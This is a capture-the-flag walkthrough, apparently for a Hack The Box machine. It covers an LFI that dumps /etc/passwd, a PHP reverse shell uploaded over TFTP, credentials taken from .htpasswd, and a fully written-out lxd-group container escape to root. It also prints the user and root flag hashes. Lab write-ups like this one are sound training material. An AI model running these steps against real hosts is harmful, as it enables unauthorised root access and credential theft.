Information Gathering

Scanned all TCP ports:

# save target IP as local variable
export ip='10.129.95.185'

#initial scan
rustscan -a $ip -- -sVC --open -oN initial

# scan results
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.95.185/?file=home.php

# udp scan results
<SUMMARY> Revealed 69/udp tftp was open </SUMMARY>

Steps 2 Pwn

1. Discovered website on port 80, looked like it was vulnerable to LFI due to ?file= parameter in URL address bar

2. Was able to dump /etc/passwd confirming this.

3. Upon dumping users, tftp user was found. Thus, crafted a php reverse shell and uploaded it via php and got initial access as the user www-data

4. Upon initial access, looked in the /var/www/html/ directory for hidden files and found .htpasswd which contained user mike creds

5. Changed to mike and retrieved user flag

6. User was part of the lxd group. Upon researching, this can be abused to gain root privileges

7. Followed this resource from HackTricks for privesc:

   # victim
   # list containers
   lxc ls
   
   ## victim has no internet access, thus, have to transfer image from attacker to victim
   
   # attacker
   git clone https://github.com/saghul/lxd-alpine-builder
   
   cd lxd-alpine-builder/
   
   sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
   
   sudo ./build-alpine -a i686
   
   python -m http.server
   
   # victim. NOTE: You will change the IP to the IP of your attacker machine
   wget http://10.10.14.167:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
   
   # victim
   # making sure in HOME folder
   # importing image
   lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
   
   #initializing lxd, making everything default that was allowed. confliction options were labeled privesc
   lxd init
   
   # initializing container and giving necessary privs
   lxc init myimage mycontainer -c security.privileged=true
   
   # mount /root into image
   lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
   
   # start container
   lxc start mycontainer
   
   # get shell in container
   lxc exec mycontainer /bin/sh
   
   # now, you should be root in container or at least have access to /root folder in /mnt/root/
   

Resolution summary

• Initial enumeration (Rustscan FTW)
• Website on port 80 vulnerable to LFI (discovered via URL address bar)
• Dumped /etc/passwd with LFI and unveiled tftp user (likely indicating TFTP being used, confirmed with UDP scan)
• Given the web technologies discovered, crafted a PHP reverse shell and uploaded it via tftp CLI and executed it
• With initial access as www-data, looked in /var/www/html/ for .htaccess/.htpasswd info and found user creds
• Found user was a part of the lxd group
• With new user, followed HackTricks section on abusing lxd/lxc group for privesc and got root!

Improved skills

• LXD/LXC group permission abuse for privesc

Used tools

• rustscan
• tftp
• GTFObins
• HackTricks

Trophy

User.txt

a56ef91d70cfbf2cdb8f454c006935a1

Root.txt

c693d9c7499d9f572ee375d4c14c7bcf